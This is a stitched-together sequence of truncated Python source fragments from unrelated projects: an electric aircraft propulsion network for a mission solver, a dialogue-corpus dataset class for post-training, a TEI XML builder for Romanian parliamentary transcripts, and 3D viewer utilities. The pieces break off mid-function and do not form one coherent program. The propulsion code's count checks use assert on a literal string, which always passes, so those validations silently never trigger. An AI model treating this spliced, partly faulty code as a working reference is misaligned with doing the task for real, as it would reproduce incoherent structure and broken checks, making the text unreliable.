Only the forward motors are operational
Source:
N/A
Inputs:
state.conditions.propulsion:
propeller_motor_torque [N-m]
lift_rotor_motor_torque [N-m]
propeller_torque [N-m]
lift_rotor_torque [N-m]
voltage_under_load [volts]
state.unknowns.battery_voltage_under_load [volts]
Outputs:
None
Properties Used:
self.voltage [volts]
"""
if segment.battery_discharge:
q_propeller_motor = segment.state.conditions.propulsion.propeller_motor_torque
q_prop_forward = segment.state.conditions.propulsion.propeller_torque
segment.state.residuals.network.propellers = (q_propeller_motor - q_prop_forward)
network = self
battery = self.battery
battery.append_battery_residuals(segment,network)
return
def residuals_lift(self,segment):
""" This packs the residuals to be send to the mission solver.
Only the lift motors are operational
Assumptions:
The lift motors are operational
Source:
N/A
Inputs:
state.conditions.propulsion:
propeller_motor_torque [N-m]
lift_rotor_motor_torque [N-m]
propeller_torque [N-m]
lift_rotor_torque [N-m]
voltage_under_load [volts]
state.unknowns.battery_voltage_under_load [volts]
Outputs:
None
Properties Used:
self.voltage [volts]
"""
if segment.battery_discharge:
q_lift_rotor_motor = segment.state.conditions.propulsion.lift_rotor_motor_torque
q_lift_rotor_lift = segment.state.conditions.propulsion.lift_rotor_torque
segment.state.residuals.network.lift_rotors = (q_lift_rotor_motor - q_lift_rotor_lift)
network = self
battery = self.battery
battery.append_battery_residuals(segment,network)
return
def add_transition_unknowns_and_residuals_to_segment(self, segment, initial_voltage = None,
initial_prop_power_coefficient = 0.005,
initial_lift_rotor_power_coefficient = 0.005,
initial_throttle_lift = 0.9,
initial_battery_cell_temperature = 283. ,
initial_battery_state_of_charge = 0.5,
initial_battery_cell_current = 5.):
""" This function sets up the information that the mission needs to run a mission segment using this network
Assumptions:
None
Source:
N/A
Inputs:
segment
initial_voltage [v]
initial_power_coefficient [float]s
Outputs:
segment.state.unknowns.battery_voltage_under_load
segment.state.unknowns.propeller_power_coefficient
segment.state.conditions.propulsion.propeller_motor_torque
segment.state.conditions.propulsion.propeller_torque
Properties Used:
N/A
"""
# unpack the ones function
ones_row = segment.state.ones_row
# Count how many unknowns and residuals based on p
n_props = len(self.propellers)
n_lift_rotors = len(self.lift_rotors)
n_motors_p = len(self.propeller_motors)
n_motors_r = len(self.lift_rotor_motors)
n_eng_p = self.number_of_propeller_engines
n_eng_r = self.number_of_lift_rotor_engines
if n_props!=n_motors_p!=n_eng_p:
assert('The number of propellers is not the same as the number of motors')
if n_lift_rotors!=n_motors_r!=n_eng_r:
assert('The number of lift_rotors is not the same as the number of motors')
# Now check if the props/lift_rotors are all identical, in this case they have the same of residuals and unknowns
if self.identical_propellers:
n_props = 1
else:
self.number_of_propeller_engines = int(self.number_of_propeller_engines)
if self.identical_lift_rotors:
n_lift_rotors = 1
else:
self.number_of_lift_rotor_engines = int(self.number_of_lift_rotor_engines)
# Assign initial segment conditions to segment if missing
battery = self.battery
append_initial_battery_conditions(segment,battery)
# add unknowns and residuals specific to battery cell
segment.state.residuals.network = Residuals()
battery.append_battery_unknowns_and_residuals_to_segment(segment,initial_voltage, initial_battery_cell_temperature ,
initial_battery_state_of_charge, initial_battery_cell_current)
if segment.battery_discharge:
segment.state.residuals.network.propellers = 0. * ones_row(n_props)
segment.state.residuals.network.lift_rotors = 0. * ones_row(n_lift_rotors)
segment.state.unknowns.throttle_lift = initial_throttle_lift * ones_row(1)
segment.state.unknowns.propeller_power_coefficient = initial_prop_power_coefficient * ones_row(n_props)
segment.state.unknowns.lift_rotor_power_coefficient = initial_lift_rotor_power_coefficient * ones_row(n_lift_rotors)
# Setup the conditions for the propellers
segment.state.conditions.propulsion.propeller_motor_torque = 0. * ones_row(n_props)
segment.state.conditions.propulsion.propeller_torque = 0. * ones_row(n_props)
segment.state.conditions.propulsion.propeller_rpm = 0. * ones_row(n_props)
segment.state.conditions.propulsion.propeller_disc_loading = 0. * ones_row(n_props)
segment.state.conditions.propulsion.propeller_power_loading = 0. * ones_row(n_props)
segment.state.conditions.propulsion.propeller_thrust = 0. * ones_row(n_props)
segment.state.conditions.propulsion.propeller_tip_mach = 0. * ones_row(n_props)
segment.state.conditions.propulsion.propeller_efficiency = 0. * ones_row(n_props)
segment.state.conditions.propulsion.propeller_motor_efficiency = 0. * ones_row(n_props)
# Setup the conditions for the lift_rotors
segment.state.conditions.propulsion.lift_rotor_motor_torque = 0. * ones_row(n_lift_rotors)
segment.state.conditions.propulsion.lift_rotor_torque = 0. * ones_row(n_lift_rotors)
segment.state.conditions.propulsion.lift_rotor_rpm = 0. * ones_row(n_lift_rotors)
segment.state.conditions.propulsion.lift_rotor_disc_loading = 0. * ones_row(n_lift_rotors)
segment.state.conditions.propulsion.lift_rotor_power_loading = 0. * ones_row(n_lift_rotors)
segment.state.conditions.propulsion.lift_rotor_thrust = 0. * ones_row(n_lift_rotors)
segment.state.conditions.propulsion.lift_rotor_tip_mach = 0. * ones_row(n_lift_rotors)
segment.state.conditions.propulsion.lift_rotor_efficiency = 0. * ones_row(n_lift_rotors)
segment.state.conditions.propulsion.lift_rotor_motor_efficiency = 0. * ones_row(n_lift_rotors)
# Ensure the mission knows how to pack and unpack the unknowns and residuals
segment.process.iterate.unknowns.network = self.unpack_unknowns_transition
segment.process.iterate.residuals.network = self.residuals_transition
return segment
def add_cruise_unknowns_and_residuals_to_segment(self, segment, initial_voltage = None,
initial_prop_power_coefficient = 0.005,
initial_battery_cell_temperature = 283.,
initial_battery_state_of_charge = 0.5,
initial_battery_cell_current = 5.):
""" This function sets up the information that the mission needs to run a mission segment using this network
Assumptions:
None
Source:
N/A
Inputs:
segment
initial_voltage [v]
initial_power_coefficient [float]s
Outputs:
segment.state.unknowns.battery_voltage_under_load
segment.state.unknowns.propeller_power_coefficient
segment.state.conditions.propulsion.propeller_motor_torque
segment.state.conditions.propulsion.propeller_torque
Properties Used:
N/A
"""
# unpack the ones function
ones_row = segment.state.ones_row
# Count how many unknowns and residuals based on p
n_props = len(self.propellers)
n_motors_p = len(self.propeller_motors)
n_eng_p = self.number_of_propeller_engines
if n_props!=n_motors_p!=n_eng_p:
assert('The number of propellers is not the same as the number of motors')
# Now check if the props/lift_rotors are all identical, in this case they have the same of residuals and unknowns
if self.identical_propellers:
n_props = 1
else:
self.number_of_propeller_engines = int(self.number_of_propeller_engines)
if self.identical_lift_rotors:
n_lift_rotors = 1
else:
self.number_of_lift_rotor_engines = int(self.number_of_lift_rotor_engines)
# Assign initial segment | |
length = len([i for i in utterance if i not in self.special_tokens])
if length > 0:
item_n.append(utterance)
l.append(length)
self.data.extend(item_n)
# (begin, end, max-length) for one session
for i in range(1, len(item_n)):
self.table.append((
offset,
offset+i,
len(self.data)
))
def __len__(self):
return len(self.table)
def packup_tokens(self, session):
tokens = []
for utterance in session:
tokens.extend(utterance + [self.eos])
tokens.pop()
return tokens
def build_for_label_0(self, session, end):
# random negative sample
while True:
rand_idx = random.randint(0, len(self.data)-1)
if rand_idx != end:
break
response = self.data[rand_idx]
# pack up the token ids
tokens = self.packup_tokens(session[:-1])
truncate_pair(tokens, response, self.args['max_len'])
ids = [self.cls] + tokens + [self.sep] + response + [self.sep]
tids = [0] * (len(tokens) + 2) + [1] * (len(response) + 1)
return ids, tids
def build_for_label_1(self, begin, end, max_l, session):
# within session
index = list(range(begin, max_l))
index.remove(end)
response = self.data[random.choice(index)]
# pack up the token ids
tokens = self.packup_tokens(session[:-1])
truncate_pair(tokens, response, self.args['max_len'])
ids = [self.cls] + tokens + [self.sep] + response + [self.sep]
tids = [0] * (len(tokens) + 2) + [1] * (len(response) + 1)
return ids, tids
def build_for_label_2(self, session):
# ground-truth
tokens = self.packup_tokens(session[:-1])
response = session[-1]
truncate_pair(tokens, response, self.args['max_len'])
ids = [self.cls] + tokens + [self.sep] + response + [self.sep]
tids = [0] * (len(tokens) + 2) + [1] * (len(response) + 1)
return ids, tids
def build_for_label_3(self, begin, max_l, session_origin):
# insert one random utterance into context
for _ in range(self.retry_time):
session = deepcopy(session_origin)
# random response sample
while True:
rand_idx = random.randint(0, len(self.data)-1)
if rand_idx not in set(range(begin, max_l)):
break
random_response = self.data[rand_idx][:self.args['res_max_len']-2]
idx = random.choice(range(len(session)))
session_label = [[0] * len(u) for u in session]
session[idx:idx] = [random_response]
session_label[idx:idx] = [[1] * len(random_response)]
ids, labels = [], []
for u, l in zip(session[:-1], session_label[:-1]):
ids.extend(u + [self.eos])
labels.extend(l + [l[-1]])
ids.pop()
labels.pop()
response = deepcopy(session[-1])
truncate_pair_with_labels(ids, labels, response, self.args['max_len'])
if sum(labels) > 0:
ids_ = [self.cls] + ids + [self.sep] + response + [self.sep]
tids = [0] * (len(ids) + 2) + [1] * (len(response) + 1)
return ids_, tids
# Fail to generate the data in label 3
return None, None
def build_for_label_4(self, session):
# random shuffle
random_idx = list(range(len(session)))
while True:
# multi shuffle
for _ in range(self.args['shuffle_time']):
random.shuffle(random_idx)
if random_idx != list(range(len(session))):
break
session = [session[i] for i in random_idx]
# ground-truth
tokens = self.packup_tokens(session[:-1])
response = session[-1]
truncate_pair(tokens, response, self.args['max_len'])
ids = [self.cls] + tokens + [self.sep] + response + [self.sep]
tids = [0] * (len(tokens) + 2) + [1] * (len(response) + 1)
return ids, tids
def build_for_label_5(self, session_origin):
# randomly delete one utterance, cannot delete the right or left utterance
for _ in range(self.retry_time):
session = deepcopy(session_origin)
labels = [[idx] * len(u) for idx, u in enumerate(session)]
idx = random.choice(range(1, len(session)-1))
tokens = [u for i, u in enumerate(session) if i != idx]
labels = [u for i, u in enumerate(labels) if i != idx]
ids, labels_ = [], []
for u, l in zip(tokens[:-1], labels[:-1]):
ids.extend(u + [self.eos])
labels_.extend(l + [l[-1]])
ids.pop()
labels_.pop()
rids_labels = labels[-1]
response = tokens[-1]
truncate_pair_with_labels(ids, labels_, response, self.args['max_len'], rids_labels=rids_labels)
# check
labels_ += rids_labels
flag = False
for idx in range(1, len(labels_)):
if labels_[idx] - labels_[idx-1] in [0, 1]:
pass
else:
flag = True
break
if flag:
ids_ = [self.cls] + ids + [self.sep] + response + [self.sep]
tids = [0] * (len(ids) + 2) + [1] * (len(response) + 1)
return ids_, tids
return None, None
def build_for_label_6(self, begin, max_l, session_origin):
# random replace one utterance, cannot replace the last one
for _ in range(self.retry_time):
session = deepcopy(session_origin)
# random sample idx
while True:
rand_idx = random.randint(0, len(self.data)-1)
if rand_idx not in set(range(begin, max_l)):
break
random_response = self.data[rand_idx][:self.args['res_max_len']-2]
idx = random.choice(range(len(session) - 1))
labels = [[0] * len(u) for u in session]
session[idx] = random_response
labels[idx] = [1] * len(random_response)
ids, labels_ = [], []
for u, l in zip(session[:-1], labels[:-1]):
ids.extend(u + [self.eos])
labels_.extend(l + [l[-1]])
ids.pop()
labels_.pop()
rids = deepcopy(session[-1])
rids_labels = labels[-1]
truncate_pair_with_labels(ids, labels_, rids, self.args['max_len'], rids_labels=rids_labels)
if sum(labels_) > 0:
ids_ = [self.cls] + ids + [self.sep] + rids + [self.sep]
tids = [0] * (len(ids) + 2) + [1] * (len(rids) + 1)
return ids_, tids
return None, None
def __getitem__(self, i):
begin, end, max_l = self.table[i]
session = self.data[begin:end+1]
# avoid the very long utterance
session = [u[:self.args['res_max_len']-2] for u in session]
while True:
ratio = random.random()
if len(session) >= 3:
# 7 division
if ratio >= 1 - 1/7:
ids, tids = self.build_for_label_0(session, end)
label = 0
elif 1 - 2/7 <= ratio < 1 - 1/7:
ids, tids = self.build_for_label_1(begin, end, max_l, session)
label = 1
elif 1 - 3/7 <= ratio < 1 - 2/7:
ids, tids = self.build_for_label_2(session)
label = 2
elif 1 - 4/7 <= ratio < 1 - 3/7:
ids, tids = self.build_for_label_3(begin, max_l, session)
label = 3
elif 1 - 5/7 <= ratio < 1 - 4/7:
ids, tids = self.build_for_label_4(session)
label = 4
elif 1 - 6/7 <= ratio < 1 - 5/7:
ids, tids = self.build_for_label_5(session)
label = 5
elif 1 - 7/7 <= ratio < 1 - 6/7:
ids, tids = self.build_for_label_6(begin, max_l, session)
label = 6
else:
# 5 division
if ratio >= 1 - 1/5:
ids, tids = self.build_for_label_0(session, end)
label = 0
elif 1 - 2/5 <= ratio < 1 - 1/5:
ids, tids = self.build_for_label_1(begin, end, max_l, session)
label = 1
elif 1 - 3/5 <= ratio < 1 - 2/5:
ids, tids = self.build_for_label_2(session)
label = 2
elif 1 - 4/5 <= ratio < 1 - 3/5:
ids, tids = self.build_for_label_3(begin, max_l, session)
label = 3
elif 1 - 5/5 <= ratio < 1 - 4/5:
ids, tids = self.build_for_label_4(session)
label = 4
if ids is not None and tids is not None:
break
mask_labels = mask_sentence(
ids,
self.args['min_mask_num'],
self.args['max_mask_num'],
self.args['masked_lm_prob'],
special_tokens=self.special_tokens,
mask=self.mask,
vocab_size=len(self.vocab),
)
return ids, tids, mask_labels, label
def save(self):
data = torch.save((self.data, self.table), self.pp_path)
print(f'[!] save preprocessed dataset into {self.pp_path}; size: {len(self.table)}')
def collate(self, batch):
ids, mask_labels, tids, labels = [], [], [], []
for ids_, tids_, mask_labels_, labels_ in batch:
ids.append(ids_)
tids.append(tids_)
mask_labels.append(mask_labels_)
labels.append(labels_)
ids = [torch.LongTensor(i) for i in ids]
tids = [torch.LongTensor(i) for i in tids]
mask_labels = [torch.LongTensor(i) for i in mask_labels]
labels = torch.LongTensor(labels)
ids = pad_sequence(ids, batch_first=True, padding_value=self.pad)
tids = pad_sequence(tids, batch_first=True, padding_value=self.pad)
mask_labels = pad_sequence(mask_labels, batch_first=True, padding_value=-1) # pad is not calculated for MLM
attn_mask = generate_mask(ids)
ids, tids, mask_labels, attn_mask, labels = to_cuda(ids, tids, mask_labels, attn_mask, labels)
return {
'ids': ids,
'tids': tids,
'mask_labels': mask_labels,
'attn_mask': attn_mask,
'label': labels,
}
class PostTrainComparisonDataset(Dataset):
'''Dynamic Mask: no mask token will be set as the -1 label
For chinese corpus, the train.txt and test.txt must have been tokenzied by the white space'''
def __init__(self, vocab, path, **args):
self.args = args
self.vocab = vocab
self.vocab.add_tokens(['[EOS]'])
self.pad = self.vocab.convert_tokens_to_ids('[PAD]')
self.sep = self.vocab.convert_tokens_to_ids('[SEP]')
self.cls = self.vocab.convert_tokens_to_ids('[CLS]')
self.unk = self.vocab.convert_tokens_to_ids('[UNK]')
self.mask = self.vocab.convert_tokens_to_ids('[MASK]')
self.eos = self.vocab.convert_tokens_to_ids('[EOS]')
self.special_tokens = set([self.pad, self.sep, self.cls, self.unk, self.mask, self.eos])
suffix = args['tokenizer'].replace('/', '_')
self.pp_path = f'{os.path.splitext(path)[0]}_post_train_{suffix}.pt'
if os.path.exists(self.pp_path):
self.data, self.table = torch.load(self.pp_path)
print(f'[!] load preprocessed file from {self.pp_path}')
return None
data = read_text_data_utterances(path, lang=self.args['lang'])
self.data = []
self.table = []
for label, utterances in tqdm(data):
if label == 0:
continue
item = self.vocab.batch_encode_plus(utterances, add_special_tokens=False)['input_ids']
offset = len(self.data)
self.data.extend(item)
counter = 0
l = []
for utterance in item:
l.append(len([i for i in utterance if i not in self.special_tokens]))
# begin, end, max-length session
for i in range(1, len(item)):
if i < self.args['min_context_length']:
continue
# check if the context and response are legal
# if sum(l[:i+1]) > self.args['min_token_length'] and l[i] > 0:
# self.table.append((offset, offset+i, len(self.data)))
if l[i] > 0:
self.table.append((offset, offset+i, len(self.data)))
def __len__(self):
return len(self.table)
def | |
<gh_stars>0
import logging
from datetime import date
from babel.dates import format_date
import re
from lxml import etree
from common import Resources
from parsing import parse_organization_name, SessionParser
from nltk.tokenize import word_tokenize
from pathlib import Path
from common import StringFormatter
from common import build_speaker_id, Gender, OrganizationType
import subprocess
from collections import namedtuple
from dateutil import parser
class XmlElements:
TEI = '{http://www.tei-c.org/ns/1.0}TEI'
titleStmt = '{http://www.tei-c.org/ns/1.0}titleStmt'
title = '{http://www.tei-c.org/ns/1.0}title'
meeting = '{http://www.tei-c.org/ns/1.0}meeting'
u = '{http://www.tei-c.org/ns/1.0}u'
div = '{http://www.tei-c.org/ns/1.0}div'
extent = '{http://www.tei-c.org/ns/1.0}extent'
measure = '{http://www.tei-c.org/ns/1.0}measure'
date = '{http://www.tei-c.org/ns/1.0}date'
bibl = '{http://www.tei-c.org/ns/1.0}bibl'
setting = '{http://www.tei-c.org/ns/1.0}setting'
tagUsage = '{http://www.tei-c.org/ns/1.0}tagUsage'
text = '{http://www.tei-c.org/ns/1.0}text'
body = '{http://www.tei-c.org/ns/1.0}body'
head = '{http://www.tei-c.org/ns/1.0}head'
note = '{http://www.tei-c.org/ns/1.0}note'
seg = '{http://www.tei-c.org/ns/1.0}seg'
kinesic = '{http://www.tei-c.org/ns/1.0}kinesic'
desc = '{http://www.tei-c.org/ns/1.0}desc'
gap = '{http://www.tei-c.org/ns/1.0}gap'
idno = '{http://www.tei-c.org/ns/1.0}idno'
listOrg = '{http://www.tei-c.org/ns/1.0}listOrg'
org = '{http://www.tei-c.org/ns/1.0}org'
orgName = '{http://www.tei-c.org/ns/1.0}orgName'
event = '{http://www.tei-c.org/ns/1.0}event'
listPerson = '{http://www.tei-c.org/ns/1.0}listPerson'
person = '{http://www.tei-c.org/ns/1.0}person'
persName = '{http://www.tei-c.org/ns/1.0}persName'
forename = '{http://www.tei-c.org/ns/1.0}forename'
surname = '{http://www.tei-c.org/ns/1.0}surname'
sex = '{http://www.tei-c.org/ns/1.0}sex'
affiliation = '{http://www.tei-c.org/ns/1.0}affiliation'
figure = '{http://www.tei-c.org/ns/1.0}figure'
graphic = '{http://www.tei-c.org/ns/1.0}graphic'
s = '{http://www.tei-c.org/ns/1.0}s'
w = '{http://www.tei-c.org/ns/1.0}w'
pc = '{http://www.tei-c.org/ns/1.0}pc'
linkGrp = '{http://www.tei-c.org/ns/1.0}linkGrp'
link = '{http://www.tei-c.org/ns/1.0}link'
class XmlAttributes:
xml_id = '{http://www.w3.org/XML/1998/namespace}id'
lang = '{http://www.w3.org/XML/1998/namespace}lang'
element_type = 'type'
meeting_n = 'n'
unit = 'unit'
quantity = 'quantity'
when = 'when'
gi = 'gi'
occurs = 'occurs'
ana = 'ana'
who = 'who'
full = 'full'
role = 'role'
event_start = 'from'
event_end = 'to'
value = 'value'
url = 'url'
ref = 'ref'
role = 'role'
msd = 'msd'
pos = 'pos'
lemma = 'lemma'
targFunc = 'targFunc'
type_ = 'type'
target = 'target'
corresp = 'corresp'
class SessionXmlBuilder:
"""Class responsible for building the XML file with the transcript of a session.
"""
def __init__(self,
input_file,
template_file,
output_directory,
output_file_prefix='ParlaMint-RO'):
"""Creates a new instance of SessionXmlBuilder class.
Parameters
----------
input_file: str, required
The path to the HTML file containing the session transcription.
template_file: str, required
The path to the file containing the XML template of the output.
output_directory: str, required
The path to the output directory.
output_file_prefix: str, optional
The prefix of the output file name. Default is `ParlaMint-RO`.
"""
self.parser = SessionParser(input_file)
self.formatter = StringFormatter()
self.output_directory = output_directory
self.output_file_prefix = output_file_prefix
self.element_tree = parse_xml_file(template_file)
self.xml = self.element_tree.getroot()
for div in self.xml.iterdescendants(XmlElements.div):
if div.get(XmlAttributes.element_type) == "debateSection":
self.debate_section = div
def write_to_file(self,
file_name=None,
group_by_year=False,
use_xmllint=False):
"""Writes the XML session to a file given by file_name or session id.
Parameters
----------
file_name: str, optional
The name of the output file. Default is the session id.
group_by_year: boolean, optional
Specifies whether to group output files into directories by year.
Default is `False`.
use_xmllint: boolean, optional
Specifies whether to use `xmllint` program for formatting the output xml.
Default is `False`.
"""
if not file_name:
file_name = "{}.xml".format(self.id_builder.session_id)
if group_by_year:
year = str(self.session_date.year)
directory = Path(self.output_directory, year)
if not directory.exists():
directory.mkdir(parents=True, exist_ok=True)
file_name = Path(directory, file_name)
else:
file_name = Path(self.output_directory, file_name)
file_name = str(file_name)
save_xml(self.element_tree, file_name, use_xmllint=use_xmllint)
def build_session_xml(self):
"""Builds the session XML from its transcription.
"""
self.session_date = self.parser.parse_session_date()
self.session_type = self.parser.parse_session_type()
self.id_builder = XmlIdBuilder(self.output_file_prefix,
self.session_date)
self._set_session_id()
self._set_session_title()
self._set_meeting_info()
self._set_session_idno()
self._set_session_date()
self._build_session_heading()
self._build_session_body()
self._build_session_footer()
self._cleanup_xml()
self._set_session_stats()
self._set_tag_usage()
def _cleanup_xml(self):
for u in self.debate_section.iterdescendants(tag=XmlElements.u):
if len(u) == 0:
self.debate_section.remove(u)
u.set(XmlAttributes.xml_id, self.id_builder.build_utterance_id())
def _build_session_footer(self):
"""Adds the end time segment(s) to the session description.
"""
end_time = self.parser.parse_session_end_time()
if end_time is not None:
note = etree.SubElement(self.debate_section, XmlElements.note)
note.set(XmlAttributes.element_type, "time")
note.text = self.formatter.to_single_line(end_time)
def _build_session_body(self):
"""Adds the session segments to the session description.
"""
is_first = True
utterance = None
for segment in self.parser.parse_session_segments():
text = segment.get_text()
if len(text) == 0:
continue
if segment.is_speaker:
note = etree.SubElement(self.debate_section, XmlElements.note)
note.set(XmlAttributes.element_type, "speaker")
note.text = self.formatter.to_single_line(text)
if segment.has_note:
note = etree.SubElement(self.debate_section,
XmlElements.note)
note.set(XmlAttributes.element_type, "editorial")
note.text = self.formatter.to_single_line(
segment.get_note_text())
utterance = etree.SubElement(self.debate_section,
XmlElements.u)
if is_first:
chairman = self.formatter.to_single_line(
segment.get_speaker())
is_first = False
speaker = self.formatter.to_single_line(segment.get_speaker())
utterance.set(XmlAttributes.ana,
"#chair" if speaker == chairman else "#regular")
utterance.set(XmlAttributes.who,
self.id_builder.get_speaker_id(speaker))
else:
seg = etree.SubElement(utterance, XmlElements.seg)
seg.set(XmlAttributes.xml_id,
self.id_builder.build_segment_id())
seg.text = self.formatter.to_single_line(text)
def _build_session_heading(self):
"""Adds the head elements to session description.
"""
head = etree.SubElement(self.debate_section, XmlElements.head)
head.text = Resources.Heading
session_head = etree.SubElement(self.debate_section, XmlElements.head)
session_head.set(XmlAttributes.element_type, "session")
session_head.text = Resources.SessionHeading.format(
format_date(self.session_date, "d MMMM yyyy"))
summary = self.parser.parse_session_summary()
if len(summary) > 0:
note = etree.SubElement(self.debate_section, XmlElements.note)
note.set(XmlAttributes.element_type, "editorial")
note.text = Resources.ToC
for summary_line in self.parser.parse_session_summary():
note = etree.SubElement(self.debate_section, XmlElements.note)
note.set(XmlAttributes.element_type, "summary")
note.text = self.formatter.normalize(summary_line)
heading = self.parser.parse_session_heading()
if heading is not None:
note = etree.SubElement(self.debate_section, XmlElements.note)
note.set(XmlAttributes.element_type, "editorial")
note.text = self.formatter.to_single_line(heading)
start_time = self.parser.parse_session_start_time()
if start_time is not None:
note = etree.SubElement(self.debate_section, XmlElements.note)
note.set(XmlAttributes.element_type, "time")
note.text = self.formatter.to_single_line(start_time)
chairmen = self.parser.parse_session_chairmen()
if chairmen is not None:
note = etree.SubElement(self.debate_section, XmlElements.note)
note.set(XmlAttributes.element_type, "chairman")
note.text = self.formatter.to_single_line(chairmen)
def _set_tag_usage(self):
"""Updates the values for tagUsage elements.
"""
name_map = {
"text": XmlElements.text,
"body": XmlElements.body,
"div": XmlElements.div,
"head": XmlElements.head,
"note": XmlElements.note,
"u": XmlElements.u,
"seg": XmlElements.seg,
"kinesic": XmlElements.kinesic,
"desc": XmlElements.desc,
"gap": XmlElements.gap
}
for tag_usage in self.xml.iterdescendants(tag=XmlElements.tagUsage):
tag_name = name_map[tag_usage.get(XmlAttributes.gi)]
num_occurences = self._get_num_occurences(tag_name)
tag_usage.set(XmlAttributes.occurs, str(num_occurences))
def _get_num_occurences(self, tag):
"""Computes the number of occurences for the specified tag.
Parameters
----------
tag: str
The tag for which to compute number of occurences.
Returns
-------
num_occurences: int
The number of times the tag is present in the document.
"""
tags = self.xml.iterdescendants(tag=tag)
num_occurences = len([t for t in tags])
return num_occurences
def _set_session_date(self):
"""Updates the session date in the XML file.
"""
for date in self.xml.iterdescendants(tag=XmlElements.date):
parent_tag = date.getparent().tag
if parent_tag == XmlElements.setting or parent_tag == XmlElements.bibl:
date.set(XmlAttributes.when,
format_date(self.session_date, "yyyy-MM-dd"))
date.text = format_date(self.session_date, "dd.MM.yyyy")
def _set_session_idno(self):
"""Updates the vale of `idno` element.
"""
for idno in self.xml.iterdescendants(tag=XmlElements.idno):
if idno.get(XmlAttributes.element_type) == 'URI':
date = format_date(self.session_date, "yyyyMMdd")
idno.text = "http://www.cdep.ro/pls/steno/steno2015.data?cam=2&dat={}".format(
date)
def _set_session_stats(self):
"""Updates the session statistics of the extent element.
"""
num_speeches = self._get_num_speeches()
num_words = self._get_num_words()
for m in self.xml.iterdescendants(tag=XmlElements.measure):
if m.getparent().tag != XmlElements.extent:
continue
lang = m.get(XmlAttributes.lang)
unit = m.get(XmlAttributes.unit)
qty = num_speeches if unit == 'speeches' else num_words
m.set(XmlAttributes.quantity, str(qty))
if unit == 'speeches':
txt = Resources.NumSpeechesRo if lang == 'ro' else Resources.NumSpeechesEn
else:
txt = Resources.NumWordsRo if lang == 'ro' else Resources.NumWordsEn
m.text = txt.format(qty)
def _get_num_words(self):
"""Computes the number of words from the session transcription.
Returns
-------
num_words: int
The number of words in the transcription.
"""
text = "".join(self.debate_section.itertext())
num_words = len(word_tokenize(text))
return num_words
def _get_num_speeches(self):
"""Computes the number of speeches (a.k.a. utterances).
Returns
-------
num_speeches: int
The number of speeches in the transcription.
"""
speeches = [s for s in self.xml.iterdescendants(tag=XmlElements.u)]
num_speeches = len(speeches)
return num_speeches
def _set_meeting_info(self):
"""Sets the contents of the meeting element.
"""
meeting_n = format_date(self.session_date, "yyyyMMdd")
for meeting in self.xml.iterdescendants(tag=XmlElements.meeting):
meeting.set(XmlAttributes.meeting_n, meeting_n)
def _set_session_title(self):
"""Sets the contents of th title elements.
"""
ro_date = format_date(self.session_date, "d MMMM yyyy", locale="ro")
en_date = format_date(self.session_date, "MMMM d yyyy", locale="en")
for elem in self.xml.iterdescendants(tag=XmlElements.title):
if elem.getparent().tag != XmlElements.titleStmt:
continue
title_type = elem.get(XmlAttributes.element_type)
lang = elem.get(XmlAttributes.lang)
if title_type == 'main' and lang == 'ro':
elem.text = Resources.SessionTitleRo.format(ro_date)
if title_type == 'main' and lang == 'en':
elem.text = Resources.SessionTitleEn.format(en_date)
if title_type == 'sub' and lang == 'ro':
elem.text = Resources.SessionSubtitleRo.format(ro_date)
if title_type == 'sub' and lang == 'en':
elem.text = Resources.SessionSubtitleEn.format(en_date)
def _set_session_id(self):
"""Sets the id of the TEI element.
"""
self.xml.set(XmlAttributes.xml_id, self.id_builder.session_id)
def apply_xmllint(file_name):
"""Formats the specified file using xmllint.
Parameters
----------
file_name: str, required
The full name of the file to be formatted.
"""
logging.info("Formatting file [{}] using xmllint.".format(file_name))
proc = subprocess.Popen(
['xmllint', '--format', '--output', file_name, file_name],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE)
proc.wait()
def parse_xml_file(file_name):
"""Parses the specified XML file.
Parameters
----------
file_name: str, required
The name of the XML file.
Returns
-------
xml_tree: etree.ElementTree
The XML tree from the file.
"""
parser = etree.XMLParser(remove_blank_text=True)
xml_tree = etree.parse(file_name, parser)
for element in xml_tree.iter():
element.tail = None
return xml_tree
def save_xml(xml, file_name, use_xmllint=True):
"""Saves the provided XML tree to the specified file and optionally applies xmllint.
Parameters
----------
xml : etree.ElementRoot, required
The XML tree to save to disk.
file_name : str, required
The file where to save the XML.
use_xmllint: bool, optional
Specifies whether to apply xmllint or not.
Default is `True`.
"""
xml.write(file_name,
pretty_print=True,
encoding='utf-8',
xml_declaration=True)
if use_xmllint:
apply_xmllint(file_name)
def add_component_file_to_corpus_root(component_file, corpus_root):
"""Adds the `component_file` to the list of included files in | |
from datetime import datetime
import numpy as np
import os
import glob
from pathlib import Path
from vtk.util.numpy_support import numpy_to_vtk, vtk_to_numpy, numpy_to_vtkIdTypeArray
import vtk
import vedo
import math
#import trimesh
ROOT_FOLDER = Path(__file__).parent.parent
ASSETS_FOLDER = ROOT_FOLDER.joinpath('./iblviewer_assets')
FONTS_FOLDER = ASSETS_FOLDER.joinpath('./fonts')
EXAMPLES_FOLDER = ROOT_FOLDER.joinpath('./iblviewer_examples')
EXAMPLES_DATA_FOLDER = ROOT_FOLDER.joinpath('./iblviewer_examples/data')
def get_type(element):
"""
Get the type of object as a string
:return: String
"""
return str(element.__class__.__name__).lower()
def get_unique_name(collection, name, spacer='_'):
"""
Create a unique key for a collection by appending numbers when entries exist
:param collection: A list, collection, array, ...
:param name: Name (for instance 'Points')
:param spacer: Spacer char
:return: New name, for instance 'Points_4'
"""
similar_ones = []
max_value = 0
if name not in collection:
return name
for key in collection:
if name in key:
similar_ones.append(key)
if spacer in key:
value = key.split(spacer)[1]
max_value = max(int(value), max_value)
value = max(len(similar_ones), max_value)
return f'{name}{spacer}{value}'
def numpy2vtk(arr, dtype=None, deep=True, name=""):
"""
Convert a numpy array into a vtkDataArray
:param arr: Array
:param dtype: Data type. Allows to set a specific data type to the VTK array
:param deep: Whether a deep copy is made. Defaults to True
:param name: Name of the array
"""
if arr is None:
return None
arr = np.ascontiguousarray(arr)
if dtype is not None and dtype!='id':
arr = arr.astype(dtype)
if dtype and dtype=='id':
varr = numpy_to_vtkIdTypeArray(arr.astype(np.int64), deep=deep)
else:
varr = numpy_to_vtk(arr, deep=deep)
if name:
varr.SetName(name)
return varr
def spherical_degree_angles_to_xyz(radius, theta, phi):
"""
Convert spherical degree angles to XYZ coordinates
:param radius: Radius
:param theta: Theta angle value in degrees
:param phi: Phi angle value in degrees
:return: List of 3 coordinates
"""
return vedo.spher2cart(radius, theta / 180 * math.pi, phi / 180 * math.pi)
def pick_object(plot, event_name=None, priority=None, cid=None):
"""
Pick an object
"""
x, y = plot.interactor.GetEventPosition()
